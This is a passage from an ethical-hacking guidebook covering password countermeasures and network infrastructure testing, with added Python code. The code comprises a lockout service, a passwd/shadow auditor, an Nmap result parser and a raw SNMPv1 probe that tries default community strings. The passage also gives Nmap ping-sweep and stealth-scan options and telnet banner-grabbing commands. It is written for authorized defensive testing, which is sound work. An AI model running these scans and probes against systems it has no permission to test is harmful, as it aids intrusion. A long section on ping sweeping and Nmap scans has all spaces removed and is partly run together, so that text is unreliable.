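    locked_until: float = 0.0       # epoch seconds; 0 means not locked
    must_change_password: bool = False
    failure_times: List[float] = field(default_factory=list)


class LoginService:
    def __init__(self, accounts: Dict[str, str]):
        self.accounts = {user: Account(pw) for user, pw in accounts.items()}
        self.audit: List[str] = []   # "Enable security auditing" from the list above

    def login(self, user: str, password: str, now: float) -> str:
        acct = self.accounts.get(user)
        if acct is None:
            self.audit.append(f"{now:.0f} unknown user {user!r}")
            return "denied"          # same answer as a wrong password, so valid IDs aren't revealed

        if acct.locked_until > now:
            self.audit.append(f"{now:.0f} {user}: attempt while locked")
            return "locked"
        if acct.locked_until:        # intruder lockout has expired: automatic reset
            acct.locked_until = 0.0
            acct.failed_streak = 0

        if password != acct.password:
            acct.failed_streak += 1
            acct.failure_times.append(now)
            self.audit.append(f"{now:.0f} {user}: failed login #{acct.failed_streak}")
            if acct.failed_streak >= LOCKOUT_THRESHOLD:
                acct.locked_until = now + LOCKOUT_SECONDS
                # Failed-login counter: a burst of failures in a short period looks
                # automated, so force a password change once the owner gets back in.
                recent = [t for t in acct.failure_times if now - t <= BURST_WINDOW]
                if len(recent) >= LOCKOUT_THRESHOLD:
                    acct.must_change_password = True
                    self.audit.append(f"{now:.0f} {user}: probable automated attack")
                return "locked"
            return "denied"

        acct.failed_streak = 0
        acct.failure_times.clear()
        if acct.must_change_password:
            return "change_password"
        return "ok"

    def change_password(self, user: str, new_password: str) -> None:
        acct = self.accounts[user]
        acct.password = new_password
        acct.must_change_password = False


if __name__ == "__main__":
    svc = LoginService({"alice": "SummerInTheSouth-Win10"})
    for t in range(10):                       # automated guessing, one attempt per second
        print(t, svc.login("alice", "wrong", float(t)))
    print(10, svc.login("alice", "SummerInTheSouth-Win10", 10.0))      # locked
    print(1900, svc.login("alice", "SummerInTheSouth-Win10", 1900.0))  # change_password
```

Ten wrong guesses in ten seconds lock the account and, because they fell inside the burst window, the owner is made to change the password when the lock expires; ten wrong guesses spread over ten hours still lock the account but are treated as ordinary forgetfulness.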

Other password-protection countermeasures include

Stronger authentication methods. Examples of these are challenge/response, smart cards, tokens, biometrics, or digital certificates.

Automated password reset. This functionality lets users manage most of their password problems without getting others involved. Otherwise, this support issue becomes expensive, especially for larger organizations.

Password-protect the system BIOS. This is especially important on servers and laptops that are susceptible to physical security threats and vulnerabilities.

Securing Operating Systems

You can implement various operating system security measures to ensure that passwords are protected.

Regularly perform these low-tech and high-tech password-cracking tests to make sure that your systems are as secure as possible — perhaps as part of a monthly, quarterly, or biannual audit of local and domain passwords.

Windows

The following countermeasures can help prevent password hacks on Windows systems:

Some Windows passwords can be gleaned by simply reading the cleartext or crackable ciphertext from the Windows Registry. Secure your registries by doing the following:

Allow only administrator access.

Harden the operating system by using well-known hardening best practices, such as those from SANS (www.sans.org), NIST (http://csrc.nist.gov), the Center for Internet Security Benchmarks/Scoring Tools (www.cisecurity.org), and the ones outlined in Network Security For Dummies by Chey Cobb.

Keep all SAM database backup copies secure.

Disable the storage of LM hashes in Windows for passwords that are shorter than 15 characters.

For example, you can create and set the NoLMHash registry key to a value of 1 under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa.

Use local or group security policies to help eliminate weak passwords on Windows systems before they’re created.

Disable null sessions in your Windows version or enable the Windows Firewall.

In Windows XP and later versions, enable the Do Not Allow Anonymous Enumeration of SAM Accounts and Shares option in the local security policy.

Chapter 12 covers Windows hacks you need to understand and test in more detail.

Linux and UNIX

The following countermeasures can help prevent password cracks on Linux and UNIX systems:

Ensure that your system is using shadowed MD5 passwords.

Help prevent the creation of weak passwords. You can use either the built-in operating system password filtering (such as cracklib in Linux) or a password-auditing program (such as npasswd or passwd+).

Check your /etc/passwd file for duplicate root UID entries. Hackers can exploit such entries to gain backdoor access.
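The two file checks in this list (shadowed password hashes and duplicate UID 0 entries) can be scripted. The following Python audit is an added example, not from the book; it runs over constructed /etc/passwd and /etc/shadow excerpts and reports hashes left in the world-readable passwd file, empty password fields, a second UID 0 account, and hash types. The text calls for MD5 as the minimum; the example also notes MD5 ($1$) hashes because current Linux distributions default to SHA-512 ($6$), which is my addition, not the book’s statement.

```python
from typing import List

# Constructed sample files; they do not come from any real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0:second root:/root:/bin/bash
legacy:$1$abcdefgh$hashstoredinpasswd:1001:1001::/home/legacy:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$fakesha512hash:17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
alice:$1$md5salt$fakemd5hash:17000:0:99999:7:::
toor:!:17000:0:99999:7:::
guest::17000:0:99999:7:::
bob:AbCdEfGhIjKlM:17000:0:99999:7:::
"""


def audit_passwd(passwd_text: str, shadow_text: str) -> List[str]:
    """Return human-readable findings for the passwd/shadow pair."""
    findings: List[str] = []
    uid0: List[str] = []

    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"{fields[0]}: malformed /etc/passwd entry")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0":
            uid0.append(name)
        if pw == "":
            findings.append(f"{name}: empty password field in /etc/passwd")
        elif pw not in ("x", "*", "!"):
            findings.append(f"{name}: password hash kept in world-readable /etc/passwd (not shadowed)")

    if len(uid0) > 1:            # the duplicate root UID check from the text
        findings.append("duplicate UID 0 accounts: " + ", ".join(uid0))

    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        name, hashed = line.split(":")[:2]
        if hashed == "":
            findings.append(f"{name}: empty password in /etc/shadow (login without a password)")
        elif hashed == "*" or hashed.startswith("!"):
            continue                                    # locked or no-login account
        elif hashed.startswith("$1$"):
            findings.append(f"{name}: MD5 ($1$) hash; current distributions default to SHA-512 ($6$)")
        elif not hashed.startswith("$"):
            findings.append(f"{name}: legacy DES crypt hash (weaker than MD5)")

    return findings


def audit_host() -> List[str]:
    """Run the same audit on the live files (reading /etc/shadow requires root)."""
    with open("/etc/passwd", encoding="utf-8", errors="replace") as fh:
        passwd = fh.read()
    with open("/etc/shadow", encoding="utf-8", errors="replace") as fh:
        shadow = fh.read()
    return audit_passwd(passwd, shadow)


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(finding)
```

The root and daemon entries produce nothing, which is the point: a clean host gives an empty report, and anything printed is worth a look.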

Chapter 13 explains the Linux hacks and how to test Linux systems for vulnerabilities.

Part III

Hacking Network Hosts

Read more about how you can find the areas of your network that are creating business risks at www.dummies.com/extras/hacking.

In this part…

Now that you’re off and running with your security tests, it’s time to take things to a new level. The tests in the previous part — at least the social engineering and physical security tests — start at a high level and are not that technical. Times, they are a-changin’! You now need to look at network security. This is where things start getting more involved.

This part starts by looking at the network from the inside and the outside for perimeter security holes, network device exploits, DoS vulnerabilities, and more. This part then looks at how to assess the security of wireless LANs that introduce some serious security vulnerabilities into networks these days. Finally, this part delves into the ever-growing number of mobile devices that employees use to connect to the network as they please.

Chapter 9

Network Infrastructure Systems

In This Chapter

Selecting tools

Scanning network hosts

Assessing security with a network analyzer

Preventing denial-of-service and infrastructure vulnerabilities

To have secure operating systems and applications, you need a secure network. Devices such as routers, firewalls, and even generic network hosts (including servers and workstations) must be assessed as part of the security testing process.

There are thousands of possible network vulnerabilities, equally as many tools, and even more testing techniques. You probably don’t have the time or resources available to test your network infrastructure systems for all possible vulnerabilities, using every tool and method imaginable. Instead, you need to focus on tests that will produce a good overall assessment of your network — and the tests I describe in this chapter produce exactly that.

You can eliminate many well-known, network-related vulnerabilities by simply patching your network hosts with the latest vendor software and firmware updates. Because many network infrastructure systems aren’t publicly accessible, odds are good that your network hosts will not be attacked from the outside. You can eliminate many other vulnerabilities by following some solid security practices on your network, as described in this chapter. The tests, tools, and techniques outlined in this chapter offer the most bang for your security assessment buck.

The better you understand network protocols, the easier network vulnerability testing is because network protocols are the foundation for most information security concepts. If you’re a little fuzzy on how networks work, I highly encourage you to read TCP/IP For Dummies, 6th Edition, by Candace Leiden and Marshall Wilensky. TCP/IP For Dummies is one of the original books that helped me develop my foundation of networking concepts early on. The Request for Comments (RFCs) list on the Official Internet Protocol Standards page, www.rfc-editor.org/search/standards.php, is a good reference as well.

Understanding Network Infrastructure Vulnerabilities

Network infrastructure vulnerabilities are the foundation for most technical security issues in your information systems. These lower-level vulnerabilities affect practically everything running on your network. That’s why you need to test for them and eliminate them whenever possible.

Your focus for security tests on your network infrastructure should be to find weaknesses that others can see in your network so you can quantify and treat your network’s level of exposure.

Many issues are related to the security of your network infrastructure. Some issues are more technical and require you to use various tools to assess them properly. You can assess others with a good pair of eyes and some logical thinking. Some issues are easy to see from outside the network, and others are easier to detect from inside your network.

When you assess your company’s network infrastructure security, you need to look at the following:

Where devices, such as a firewall or an IPS, are placed on the network and how they’re configured

What external attackers see when they perform port scans and how they can exploit vulnerabilities in your network hosts

Network design, such as Internet connections, remote access capabilities, layered defenses, and placement of hosts on the network

Interaction of installed security devices, such as firewalls, intrusion prevention systems (IPSs), antivirus, and so on

What protocols are in use, including known vulnerable ones such as Secure Sockets Layer (SSL)

Commonly attacked ports that are unprotected

Network host configurations

Network monitoring and maintenance

If someone exploits a vulnerability in one of the items in the preceding list or anywhere in your network’s security, bad things can happen:

An attacker can launch a denial of service (DoS) attack, which can take down your Internet connection — or your entire network.

A malicious employee using a network analyzer can steal confidential information in e-mails and files sent over the network.

A hacker can set up back-door access into your network.

A contractor can attack specific hosts by exploiting local vulnerabilities across the network.

Before assessing your network infrastructure security, remember to do the following:

Test your systems from the outside in, and the inside in (that is, on and between internal network segments and demilitarized zones [DMZs]).

Obtain permission from partner networks to check for vulnerabilities on their systems that can affect your network’s security, such as open ports, lack of a firewall, or a misconfigured router.

Choosing Tools

As with all security assessments, your network security tests require the right tools — you need port scanners, protocol analyzers, and vulnerability assessment tools. Great commercial, shareware, and freeware tools are available. I describe a few of my favorite tools in the following sections. Just keep in mind that you need more than one tool because no tool does everything you need.

If you’re looking for easy-to-use security tools with all-in-one packaging, you get what you pay for most of the time — especially for the Windows platform. Tons of security professionals swear by many free security tools, especially those that run on Linux and other UNIX-based operating systems. Many of these tools offer a lot of value — if you have the time, patience, and willingness to learn their ins and outs. It’d behoove you to compare the results of the free tools with that of their commercial counterparts. I’ve definitely found some benefits to using the latter.

Scanners and analyzers

These scanners provide practically all the port scanning and network testing you need:

Cain & Abel (www.oxid.it/cain.html) for network analysis and ARP poisoning

Essential NetTools (www.tamos.com/products/nettools) for a wide variety of network scanning functionality

NetScanTools Pro (www.netscantools.com) for dozens of network security assessment functions, including ping sweeps, port scanning, and SMTP relay testing

Getif (www.wtcs.org/snmp4tpc/getif.htm), an oldie but goodie tool for SNMP enumeration

Nmap (http://nmap.org) — or NMapWin (http://sourceforge.net/projects/nmapwin), the happy-clicky-GUI front end to Nmap — for host-port probing and operating system fingerprinting

Savvius OmniPeek (www.savvius.com) for network analysis

Wireshark (www.wireshark.org) for network analysis

Vulnerability assessment

These vulnerability assessment tools, among others, allow you to test your network hosts for various known vulnerabilities as well as potential configuration issues that could lead to security exploits:

GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) for port scanning and vulnerability testing

Nexpose (www.rapid7.com/vulnerability-scanner.jsp), an all-in-one tool for in-depth vulnerability testing

Scanning, Poking, and Prodding the Network

Performing the ethical hacks described in the following sections on your network infrastructure involves following basic hacking steps:

1. Gather information and map your network.

2. Scan your systems to see which ones are available.

3. Determine what’s running on the systems discovered.

4. Attempt to penetrate the systems discovered if you choose to.

Every network card driver and implementation of TCP/IP in most operating systems, including Windows and Linux, and even in your firewalls and routers, has quirks that result in different behaviors when scanning, poking, and prodding your systems. This can result in different responses from your various systems, including everything from false-positive findings to denial of service (DoS) conditions. Refer to your administrator guides or vendor websites for details on any known issues and possible patches that are available to fix those issues. If you patched all your systems, you shouldn’t have any issues — just know that anything’s possible.

Scanning ports

A port scanner shows you what’s what on your network by scanning the network to see what’s alive and working. Port scanners provide basic views of how the network is laid out. They can help identify unauthorized hosts or applications and network host configuration errors that can cause serious security vulnerabilities.

The big-picture view from port scanners often uncovers security issues that might otherwise go unnoticed. Port scanners are easy to use and can test network hosts regardless of what operating systems and applications they’re running. The tests are usually performed relatively quickly without having to touch individual network hosts, which would be a real pain otherwise.

The trick to assessing your overall network security is interpreting the results you get from a port scan. You can get false positives on open ports, and you might have to dig deeper. For example, User Datagram Protocol (UDP) scans — like the protocol itself — are less reliable than Transmission Control Protocol (TCP) scans and often produce false positives because many applications don’t know how to respond to random incoming UDP requests.

A feature-rich scanner such as Nexpose often can identify ports and see what’s running in one step.

Port scans can take a good bit of time. The length of time depends on the number of hosts you have, the number of ports you scan, the tools you use, the processing power of your test system, and the speed of your network links.

An important tenet to remember is that you need to scan more than just the important hosts. Leave no stone unturned — if not at first, then eventually. These other systems often bite you if you ignore them. Also, perform the same tests with different utilities to see whether you get different results. Not all tools find the same open ports and vulnerabilities. This is unfortunate, but it’s a reality of ethical hacking tests.

If your results don’t match after you run the tests using different tools, you might want to explore the issue further. If something doesn’t look right — such as a strange set of open ports — it probably isn’t. Test again; if you’re in doubt, use another tool for a different perspective.

If possible, you should scan all 65,534 TCP ports on each network host that your scanner finds. If you find questionable ports, look for documentation that the application is known and authorized. It’s not a bad idea to scan all 65,534 UDP ports as well. Just know this can add a considerable amount of time to your scans.

For speed and simplicity, you can scan the commonly hacked ports, listed in Table 9-1.

Table 9-1 Commonly Hacked Ports

Port Number | Service | Protocol(s)
7 | Echo | TCP, UDP
19 | Chargen | TCP, UDP
20 | FTP data (File Transfer Protocol) | TCP
21 | FTP control | TCP
22 | SSH | TCP
23 | Telnet | TCP
25 | SMTP (Simple Mail Transfer Protocol) | TCP
37 | Time | TCP, UDP
53 | DNS (Domain Name System) | UDP
69 | TFTP (Trivial File Transfer Protocol) | UDP
79 | Finger | TCP, UDP
80 | HTTP (Hypertext Transfer Protocol) | TCP
110 | POP3 (Post Office Protocol version 3) | TCP
111 | SUN RPC (remote procedure calls) | TCP, UDP
135 | RPC/DCE (endpoint mapper) for Microsoft networks | TCP, UDP
137, 138, 139, 445 | NetBIOS over TCP/IP | TCP, UDP
161 | SNMP (Simple Network Management Protocol) | TCP, UDP
443 | HTTPS (HTTP over TLS) | TCP
512, 513, 514 | Berkeley r-services and r-commands (such as rsh, rexec, and rlogin) | TCP
1433 | Microsoft SQL Server (ms-sql-s) | TCP, UDP
1434 | Microsoft SQL Monitor (ms-sql-m) | TCP, UDP
1723 | Microsoft PPTP VPN | TCP
3389 | Windows Terminal Server | TCP
8080 | HTTP proxy | TCP
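The hard part of port scanning, as the text says, is interpreting the results: deciding which open ports are authorized, which are news, and which are probably UDP false positives. The following Python example is added here and is not from the book or from Nmap; it parses a constructed scan result written in Nmap’s grepable (-oG) layout, compares it against an assumed baseline of authorized services, and uses the Table 9-1 port numbers to prioritize the unexpected ones. Ports reported only as open|filtered are set aside for verification rather than counted as findings.

```python
from typing import Dict, List, Set, Tuple

# Port numbers from Table 9-1, split by protocol, used to prioritise review.
COMMONLY_HACKED: Dict[str, Set[int]] = {
    "tcp": {7, 19, 20, 21, 22, 23, 25, 37, 79, 80, 110, 111, 135, 137, 138, 139, 445,
            161, 443, 512, 513, 514, 1433, 1434, 1723, 3389, 8080},
    "udp": {7, 19, 37, 53, 69, 79, 111, 135, 137, 138, 139, 445, 161, 1433, 1434},
}

PortKey = Tuple[str, int]          # (protocol, port)

# Constructed baseline of authorised services: host -> set of (protocol, port).
BASELINE: Dict[str, Set[PortKey]] = {
    "10.0.0.10": {("tcp", 22), ("tcp", 443)},
    "10.0.0.11": {("tcp", 22), ("tcp", 25), ("tcp", 443)},
}

# Constructed scan results in Nmap's grepable (-oG) layout; not a real scan.
SCAN_OUTPUT = """\
# Nmap scan (constructed sample)
Host: 10.0.0.10 ()\tStatus: Up
Host: 10.0.0.10 ()\tPorts: 22/open/tcp//ssh///, 443/open/tcp//https///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (997)
Host: 10.0.0.11 ()\tPorts: 25/open/tcp//smtp///, 443/open/tcp//https///, 161/open|filtered/udp//snmp///
Host: 10.0.0.12 ()\tPorts: 23/open/tcp//telnet///, 80/open/tcp//http///
# Nmap done
"""


def parse_grepable(text: str) -> Tuple[Dict[str, Set[PortKey]], Set[Tuple[str, str, int]]]:
    """Return confirmed-open ports per host, plus (host, proto, port) triples whose
    state is only open|filtered (typical for UDP) and still needs verification."""
    open_ports: Dict[str, Set[PortKey]] = {}
    unverified: Set[Tuple[str, str, int]] = set()
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        parts = line.split("\t")
        host = parts[0].split()[1]
        open_ports.setdefault(host, set())
        for part in parts[1:]:
            if not part.startswith("Ports:"):
                continue
            for entry in part[len("Ports:"):].strip().split(", "):
                port, state, proto = entry.split("/")[:3]
                if state == "open":
                    open_ports[host].add((proto, int(port)))
                elif state.startswith("open"):          # open|filtered: unreliable
                    unverified.add((host, proto, int(port)))
    return open_ports, unverified


def compare_to_baseline(scan: Dict[str, Set[PortKey]],
                        baseline: Dict[str, Set[PortKey]]) -> List[Tuple[str, str, int, str]]:
    """Label every deviation from the baseline; commonly hacked ports get a tag."""
    findings: List[Tuple[str, str, int, str]] = []
    for host, ports in scan.items():
        expected = baseline.get(host)
        for proto, port in sorted(ports):
            if expected is None:
                label = "unknown host"
            elif (proto, port) not in expected:
                label = "unauthorized"
            else:
                continue
            if port in COMMONLY_HACKED.get(proto, set()):
                label += ", commonly hacked"
            findings.append((host, proto, port, label))
        for proto, port in sorted(expected or set()):
            if (proto, port) not in ports:       # possibly filtered, or service is down
                findings.append((host, proto, port, "expected service not seen"))
    return findings


if __name__ == "__main__":
    scan, unverified = parse_grepable(SCAN_OUTPUT)
    for host, proto, port, label in compare_to_baseline(scan, BASELINE):
        print(f"{host} {proto}/{port}: {label}")
    for host, proto, port in sorted(unverified):
        print(f"{host} {proto}/{port}: open|filtered, verify with a second tool")
```

In the sample, Terminal Server on 10.0.0.10 and a host nobody documented (10.0.0.12, running telnet and HTTP) are the items to chase, SSH missing from 10.0.0.11 is worth a question, and the SNMP result is exactly the kind of UDP answer the text says to confirm with another tool before acting on.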

PingsweepingApingsweepofallyournetworksubnetsandhostsisagoodwaytofindoutwhichhostsarealiveandkickingonthenetwork.ApingsweepiswhenyoupingarangeofaddressesusingInternetControlMessageProtocol(ICMP)packets.Figure9-1showsthecommandandtheresultsofusingNmaptoperformapingsweepofaclassCsubnetrange.

Figure9-1:PerformingapingsweepofanentireclassCnetworkwithNmap.

DozensofNmapcommandlineoptionsexist,whichcanbeoverwhelmingwhenyouwantonlyabasicscan.Nonetheless,youcanenternmaponthecommandlinetoseealltheoptionsavailable.

ThefollowingcommandlineoptionscanbeusedforanNmappingsweep:

-sPtellsNmaptoperformapingscan.-ntellsNmapnottoperformnameresolution.-T4tellsNmaptoperformanaggressive(faster)scan.

192.168.1.1-254tellsNmaptoscantheentire192.168.1.0subnet.

UsingportscanningtoolsMostportscannersoperateinthreesteps:

1. TheportscannersendsTCPSYNrequeststothehostorrangeofhostsyousetittoscan.

SomeportscannersperformpingsweepstodeterminewhichhostsareavailablebeforestartingtheTCPportscans.

MostportscannersbydefaultscanonlyTCPports.Don’tforgetaboutUDPports.YoucanscanUDPportswithaUDPportscanner,suchasNmap.

2. Theportscannerwaitsforrepliesfromtheavailablehosts.3. Theportscannerprobestheseavailablehostsforupto65,534possibleTCPand

UDPports—basedonwhichportsyoutellittoscan—toseewhichoneshaveavailableservicesonthem.

Theportscansprovidethefollowinginformationaboutthelivehostsonyournetwork:

HoststhatareactiveandreachablethroughthenetworkNetworkaddressesofthehostsfoundServicesorapplicationsthatthehostsmayberunning

Afterperformingagenericsweepofthenetwork,youcandigdeeperintospecifichostsyoufind.

Nmap

Afteryouhaveageneralideaofwhathostsareavailableandwhatportsareopen,youcanperformfancierscanstoverifythattheportsareactuallyopenandnotreturningafalsepositive.Nmapallowsyoutorunthefollowingadditionalscans:

Connect:ThisbasicTCPscanlooksforanyopenTCPportsonthehost.Youcanusethisscantoseewhat’srunninganddeterminewhetherintrusionpreventionsystems(IPSs),firewalls,orotherloggingdeviceslogtheconnections.UDPscan:ThisbasicUDPscanlooksforanyopenUDPportsonthehost.Youcanusethisscantoseewhat’srunninganddeterminewhetherIPSs,firewalls,orotherloggingdeviceslogtheconnections.SYNStealth:Thisscancreatesahalf-openTCPconnectionwiththehost,possiblyevadingIPSsystemsandlogging.ThisisagoodscanfortestingIPSs,firewalls,andotherloggingdevices.FINStealth,XmasTree,andNull:Thesescansletyoumixthingsupabitby

sendingstrangelyformedpacketstoyournetworkhostssoyoucanseehowtheyrespond.ThesescanschangearoundtheflagsintheTCPheadersofeachpacket,whichallowsyoutotesthoweachhosthandlesthemtopointoutweakTCP/IPimplementationsaswellaspatchesthatmightneedtobeapplied.

Becarefulwhenperformingthesescans.YoucancreateyourownDoSattackandpotentiallycrashapplicationsorentiresystems.Unfortunately,ifyouhaveahostwithaweakTCP/IPstack(thesoftwarethatcontrolsTCP/IPcommunicationsonyourhosts),there’snogoodwaytopreventyourscanfromcreatingaDoSattack.AgoodwaytohelpreducethechanceofthisoccurringistousetheslowNmaptimingoptions—Paranoid,Sneaky,orPolite—whenrunningyourscans.

Figure 9-2 shows the NMapWin Scan tab, where you can select the Scan Mode options (Connect, UDP Scan, and so on). If you're a command line fan, you see the command line parameters displayed in the lower-left corner of the NMapWin screen. This helps when you know what you want to do and the command line help isn't enough.

Figure 9-2: In-depth port-scanning options in NMapWin.

If you connect to a single port (as opposed to several all at one time) without making too much noise, you might be able to evade your firewall or IPS. This is a good test of your network security controls, so look at your logs to see what they saw during this process.

NetScanTools Pro

NetScanTools Pro (www.netscantools.com) is a very nice all-in-one commercial tool for gathering general network information, such as the number of unique IP addresses, NetBIOS names, and MAC addresses. It also has a neat feature that allows you to fingerprint the operating systems of various hosts. Figure 9-3 shows the OS Fingerprinting results while scanning a wireless network access point.

Figure 9-3: NetScanTools Pro OS Fingerprinting tool.

Countermeasures against ping sweeping and port scanning

Enable only the traffic you need to access internal hosts (preferably as far as possible from the hosts you're trying to protect) and deny everything else. This goes for standard ports, such as TCP 80 for HTTP and ICMP for ping requests.

Configure firewalls to look for potentially malicious behavior over time (such as the number of packets received in a certain period of time) and have rules in place to cut off attacks if a certain threshold is reached, such as 10 port scans in one minute or 100 consecutive ping (ICMP) requests.

Most firewalls and IPSs can detect such scanning and cut it off in real time.

You can break applications on your network when restricting network traffic, so make sure that you analyze what's going on and understand how applications and protocols are working before you disable any type of network traffic.

Scanning SNMP

Simple Network Management Protocol (SNMP) is built into virtually every network device. Network management programs (such as HP OpenView and LANDesk) use SNMP for remote network host management. Unfortunately, SNMP also presents security vulnerabilities.

Vulnerabilities

The problem is that most network hosts run SNMP enabled with the default read/write community strings of public/private. The majority of network devices I come across have SNMP enabled and don't even need it.

If SNMP is compromised, a hacker may be able to gather such network information as ARP tables, usernames, and TCP connections to attack your systems further. If SNMP shows up in port scans, you can bet that a malicious attacker will try to compromise the system.

Here are some utilities for SNMP enumeration:

- The commercial tools NetScanTools Pro and Essential NetTools
- Free Windows GUI-based Getif
- Free Windows text-based SNMPUTIL (www.wtcs.org/snmp4tpc/FILES/Tools/SNMPUTIL/SNMPUTIL.zip)

On Linux, snmpwalk from the Net-SNMP package does the same job from the command line.

You can use Getif to enumerate systems with SNMP enabled, as shown in Figure 9-4.

Figure 9-4: General SNMP information gathered by Getif.

In this test, I was able to glean a lot of information from a wireless access point, including model number, firmware revision, and system uptime. All this could be used against the host if an attacker wanted to exploit a known vulnerability in this particular system. By digging in further, I was able to discover several management interface usernames on this access point, as shown in Figure 9-5. You certainly don't want to show the world this information.

Figure 9-5: Management interface user IDs gleaned via Getif's SNMP browsing function.

For a list of vendors and products affected by the well-known SNMP vulnerabilities, refer to www.cert.org/historical/advisories/CA-2002-03.cfm.
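What an enumeration tool like Getif or snmpwalk actually puts on the wire when it tries a community string, as an added example that is not code from the book or from any of the tools named above: an SNMPv1 GetRequest for sysDescr.0 built by hand, and a parser for the GetResponse. The encoder is exercised offline against a constructed reply; probe() would send the same bytes to a real agent on UDP/161. The host, community strings and the fake sysDescr value are assumptions.

```python
"""Added example (not from the book): hand-built SNMPv1 GetRequest/GetResponse
messages, which is all an enumeration tool like Getif or snmpwalk sends when
it tries a community string. The encoder is exercised offline against a
constructed response; probe() would send the same bytes to a real agent.
The host, community strings and the fake sysDescr value are assumptions."""
import socket

SYS_DESCR = (1, 3, 6, 1, 2, 1, 1, 1, 0)        # SNMPv2-MIB::sysDescr.0
DEFAULT_COMMUNITIES = [b"public", b"private"]  # the defaults the book warns about

# --- minimal BER (the ASN.1 encoding SNMP uses) ---
def ber_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body

def ber_int(v):                      # non-negative INTEGER, keeping the sign bit clear
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))

def ber_oid(arcs):                   # first two arcs packed into one byte, rest base-128
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return tlv(0x06, bytes(out))

def read_tlv(buf, pos=0):
    """Return (tag, body, position after this element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(body):
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return tuple(arcs)

# --- SNMPv1 messages ---
def build_get(community, oid, request_id=1):
    """SNMPv1 GetRequest (PDU tag 0xA0) for one OID; the community travels in cleartext."""
    varbinds = tlv(0x30, tlv(0x30, ber_oid(oid) + b"\x05\x00"))   # value is NULL in a request
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return tlv(0x30, ber_int(0) + tlv(0x04, community) + pdu)      # version 0 == SNMPv1

def parse_response(msg):
    """Return (community, error_status, [(oid, value)]) from a GetResponse (0xA2)."""
    _, body, _ = read_tlv(msg)
    _, _, p = read_tlv(body)                       # version
    _, community, p = read_tlv(body, p)
    tag, pdu, _ = read_tlv(body, p)
    if tag != 0xA2:
        raise ValueError("not a GetResponse")
    _, _, p = read_tlv(pdu)                        # request-id
    _, err, p = read_tlv(pdu, p)
    _, _, p = read_tlv(pdu, p)                     # error-index
    _, varbinds, _ = read_tlv(pdu, p)
    out, p = [], 0
    while p < len(varbinds):
        _, vb, p = read_tlv(varbinds, p)
        _, oid, q = read_tlv(vb)
        vtag, val, _ = read_tlv(vb, q)
        out.append((decode_oid(oid), val.decode("latin-1") if vtag == 0x04 else val.hex()))
    return community, int.from_bytes(err, "big") if err else 0, out

def probe(host, community, oid=SYS_DESCR, timeout=2.0):
    """Send one GetRequest over UDP/161; returns the parsed reply or None on silence.
    Only run this against devices you're authorized to test."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(build_get(community, oid), (host, 161))
        data, _ = s.recvfrom(4096)
        return parse_response(data)
    except socket.timeout:
        return None                    # wrong community: most agents just stay silent
    finally:
        s.close()

def fake_response(community, oid, value, request_id=1):
    """Constructed GetResponse, standing in for a real agent so the demo runs offline."""
    varbinds = tlv(0x30, tlv(0x30, ber_oid(oid) + tlv(0x04, value)))
    pdu = tlv(0xA2, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return tlv(0x30, ber_int(0) + tlv(0x04, community) + pdu)

if __name__ == "__main__":
    print(build_get(b"public", SYS_DESCR).hex())
    reply = fake_response(b"public", SYS_DESCR, b"WAP-1234 firmware 2.1.7 (constructed)")
    print(parse_response(reply))
```

The point worth noticing in the bytes is that the community string is an ordinary OCTET STRING in the clear, which is why a sniffer on the management VLAN gets it for free and why SNMPv3's per-user authentication is the real fix.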

Countermeasures against SNMP attacks

Preventing SNMP attacks can be as simple as A-B-C:

- Always disable SNMP on hosts if you're not using it, period.
- Block the SNMP ports (UDP ports 161 and 162) at the network perimeter.
- Change the default SNMP community read string from public and the default community write string from private to another long and complex value that's virtually impossible to guess. Because a community string crosses the wire in cleartext, also restrict the agent to answering only your management stations' addresses where the device supports it.

There's technically a "U" that's part of the solution: upgrade. Upgrading your systems (at least the ones you can) to SNMP version 3 can resolve many of the well-known SNMP security weaknesses, because SNMPv3 replaces the shared community string with per-user authentication and, in authPriv mode, encryption.

Grabbing banners

Banners are the welcome screens that divulge software version numbers and other system information on network hosts. This banner information might identify the operating system, the version number, and the specific service packs to give the bad guys a leg up on attacking the network. You can grab banners by using either good old telnet or some of the tools I mention, such as Nmap and SuperScan.

telnet

You can telnet to hosts on the default telnet port (TCP port 23) to see whether you're presented with a login prompt or any other information. Just enter the following line at the command prompt in Windows or UNIX:

telnet ip_address

You can telnet to other commonly used ports with these commands:

SMTP: telnet ip_address 25
HTTP: telnet ip_address 80
POP3: telnet ip_address 110

SMTP and POP3 servers speak first, so the banner appears as soon as you connect. A web server waits for you: type a request such as HEAD / HTTP/1.0 followed by an empty line, and the Server header in the reply is the banner.

